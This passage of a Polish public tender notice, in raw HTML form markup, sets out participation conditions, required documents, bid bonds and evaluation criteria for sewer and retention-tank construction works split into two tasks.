zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2018-08-03</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">nie dotyczy</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Składając ofertę :a) dla zadania nr 1 Wykonawca musi wykazać posiadanie środków finansowych lub zdolności kredytowej w wysokości nie mniejszej niż 3,0 mln PLN w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia: - warunek określony w ppkt 4) a) wykonawcy musza spełniać łącznieb) dla zadania nr 2 Wykonawca musi wykazać posiadanie środków finansowych lub zdolności kredytowej w wysokości nie mniejszej niż 1,5 mln PLN w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia: - warunek określony w ppkt 4) b) wykonawcy musza spełniać łącznie</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">2) posiadania wiedzy i doświadczenia: Zamawiający uzna warunek za spełniony, jeżeli Wykonawca:Składając ofertę dla zadania nr 1:- wykaże, wykonanie (zakończenie) w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, jednej roboty budowlanej o wartości nie mniejszej niż 4.000.000,00 zł, która swoim zakresem obejmowała budowę, rozbudowę lub przebudowę kanalizacji wraz ze zbiornikiem retencyjnym.Zamawiający dopuszcza aby Wykonawca w celu spełnienia warunku posiadania wiedzy i doświadczenia wykazał się kilkoma robotami budowlanymi na łączną wartość min. 4.000.000,00 zł, które swoim zakresem obejmowały budowę, rozbudowę lub przebudowę kanalizacji z zastrzeżeniem, że przynajmniej jedna z nich obejmowała także budowę, rozbudowę lub przebudowę zbiornika retencyjnego.Składając ofertę dla zadania nr 2:- wykaże, wykonanie (zakończenie) w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, jednej roboty budowlanej o wartości nie mniejszej niż 2.500.000,00 zł, która swoim zakresem obejmowała budowę, rozbudowę lub przebudowę kanalizacji wraz ze zbiornikiem retencyjnym.Zamawiający dopuszcza aby Wykonawca w celu spełnienia warunku posiadania wiedzy i doświadczenia wykazał się kilkoma robotami budowlanymi na łączną wartość min. 2.500.000,00 zł, które swoim zakresem obejmowały budowę, rozbudowę lub przebudowę kanalizacji z zastrzeżeniem, że przynajmniej jedna z nich obejmowała także budowę, rozbudowę lub przebudowę zbiornika retencyjnego.Ocena warunku na podstawie przedłożonych dokumentów.3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia:a) potencjał techniczny Zamawiający nie precyzuje określonych wymagań. Zamawiający dokona oceny spełnienia warunków w tym zakresie na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu.b) potencjał kadrowyWykonawca musi wskazać osoby, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialne za kierowanie robotami budowlanymi -legitymującymi się kwalifikacjami zawodowymi, doświadczeniem i wykształceniem niezbędnym do wykonania zamówienia.Warunek zostanie spełniony, jeżeli Wykonawca wykaże, iż dysponuje osobami wykonującymi poniższe czynności: Składając ofertę dla zadania nr 1:- jedną osobą pełniącą funkcję kierownika budowy - posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych Minimalne doświadczenie zawodowe: na stanowisku Kierownika Budowy - co najmniej 6 lat doświadczenia zawodowego na stanowisku Kierownika Budowy (liczone od dnia uzyskania uprawnień), w tym przy realizacji min. jednej roboty budowlanej polegającej na budowie, rozbudowie lub przebudowie kanalizacji deszczowej wraz ze zbiornikami retencyjnym - jedną osobą pełniącą funkcję kierownika robót - minimalne doświadczenie zawodowe: * na stanowisku Kierownika Robót Elektrycznych - co najmniej 2 lata doświadczenia zawodowego na stanowisku Kierownika Robót Elektrycznych, liczone od dnia uzyskania uprawnień, posiadający uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych	* na stanowisku Kierownika Robót Budowlanych - co najmniej 2 lata doświadczenia zawodowego na stanowisku Kierownika Robót, liczone od dnia uzyskania uprawnień, w specjalności konstrukcyjno-budowlanej bez ograniczeń	* na stanowisku Kierownika Robót Drogowych - co najmniej 2 lata doświadczenia zawodowego na stanowisku Kierownika Robót, liczone od dnia uzyskania uprawnień, uprawnienia do wykonywania samodzielnych funkcji kierownika robót w specjalności drogowej Dodatkowo wykonawca musi posiadać do dyspozycji:- geodetę posiadającego kwalifikacje zawodowe w geodezji i kartografii,Składając ofertę dla zadania nr 2:- jedną osobą pełniącą funkcję kierownika budowy - posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeńMinimalne doświadczenie zawodowe: na stanowisku Kierownika Budowy - co najmniej 6 lat doświadczenia zawodowego na stanowisku Kierownika Budowy (liczone od dnia uzyskania uprawnień), w tym przy realizacji min. jednej roboty budowlanej polegającej na budowie, rozbudowie lub przebudowie kanalizacji deszczowej wraz ze zbiornikami retencyjnym - jedną osobą pełniącą funkcję kierownika robót - minimalne doświadczenie zawodowe: * na stanowisku Kierownika Robót Budowlanych - co najmniej 2 lata doświadczenia zawodowego na stanowisku Kierownika Robót, liczone od dnia uzyskania uprawnień, w tym przy realizacji minimum jednej oczyszczalni ścieków, uprawnienia do kierowania robotami budowlanymi w odniesieniu do konstrukcji oraz architektury obiektu bez ograniczeń	* na stanowisku Kierownika Robót Drogowych - co najmniej 2 lata doświadczenia zawodowego na stanowisku Kierownika Robót, liczone od dnia uzyskania uprawnień, uprawnienia do wykonywania samodzielnych funkcji kierownika robót w specjalności drogowej bez ograniczeńDodatkowo wykonawca musi posiadać do dyspozycji:- geodetę posiadającego kwalifikacje zawodowe w geodezji i kartografii,Wszyscy w/w specjaliści muszą być członkami okręgowej izby inżynierów budownictwa ( i mieć aktualne zaświadczenie z tej izby ). Muszą posiadać w/w uprawnienia lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa.Zamawiający dopuszcza łączenie funkcji kierownika budowy i kierownika robót.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe">zgodnie z pkt. 9.1.3 b)</span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1) odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy2) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.3) aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.Wykonawca, którego oferta zostanie najwyżej oceniona, na wezwanie Zamawiającego zobowiązany będzie złożyć oświadczenia i dokumenty podmiotu, na zdolności lub sytuację którego Wykonawca powoływał się w celu wykazania spełniania warunków udziału w postępowaniu. Wykonawca zobowiązany będzie złożyć dokumenty tego podmiotu potwierdzające spełnianie warunków udziału w postępowaniu w zakresie zdolności lub sytuacji, na których Wykonawca polegał w celu wykazania spełniania tych warunków (dokumenty wskazane powyżej).</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane na formularzu zgodnym z treścią załącznika nr 8 do SIWZ, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone; przy czym dowodami o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty.2)	wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych za świadczenie usług, kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami na formularzu zgodnym z treścią załącznika nr 9 do SIWZ wraz z załącznikiem nr 10 do SIWZ3) Wykonawca musi wykazać posiadanie środków finansowych lub zdolności kredytowej zg. z pkt.9.1 ppkt.4a lub 4b. W celu wykazania spełnienia warunków udziału w postępowaniu Wykonawca może stosownie do zapisów art. 22a Pzp - polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia , w szczególności przedstawiając w tym celu pisemne zobowiązanie (oryginał) tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Pisemne zobowiązanie winno zawierać w szczególności; a) zakres dostępnych Wykonawcy zasobów innego podmiotu,b) sposób wykorzystania zasobów innego podmiotu, przez Wykonawcę przy wykonywaniu zamówienia,c) charakter stosunku jaki będzie łączył wykonawcę z innym podmiotem,e) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia. Zobowiązanie podmiotu trzeciego Wykonawca składa w oryginale wraz z ofertą. UWAGA: W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują usługi, do realizacji których te zdolności są wymagane.Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 22a, odpowiada solidarnie z Wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy. </span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">-Formularz ofertowy.-Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia ; zobowiązanie podmiotu udostępniającego zasoby zgodnym z treścią załącznika nr 5 do SIWZ - należy dołączyć do oferty w oryginale-W przypadku wadium wnoszonego w formie innej niż pieniężna dowód wniesienia wadium tj. gwarancję/poręczenie - w oryginale należy dołączyć do oferty,dowód wniesienia wadium w formie pieniężnej tj. dowód wpłaty - należy dołączyć do oferty-Pełnomocnictwo złożone w formie oryginału lub notarialnie poświadczonej kopii na formularzu zgodne z treścią załącznika nr 7 do SIWZ - należy dołączyć do oferty-Oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej składane w terminie 3 dni od dnia zamieszczenia na stronie internetowej Zamawiającego informacji z otwarcia ofert, o której mowa w art. 86 ust. 5 ustawy.zgodnie z pkt.10 SIWZ</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Zamawiający żąda od Wykonawców wniesienia wadium w wysokości:Składając ofertę dla zadania nr 1: 100.000,00 zł -(słownie: sto tysięcy złotych) Składając ofertę dla zadania nr 2: 70.000,00 zł -(słownie: siedemdziesiąt tysięcy złotych) </span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>gwarancja</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span 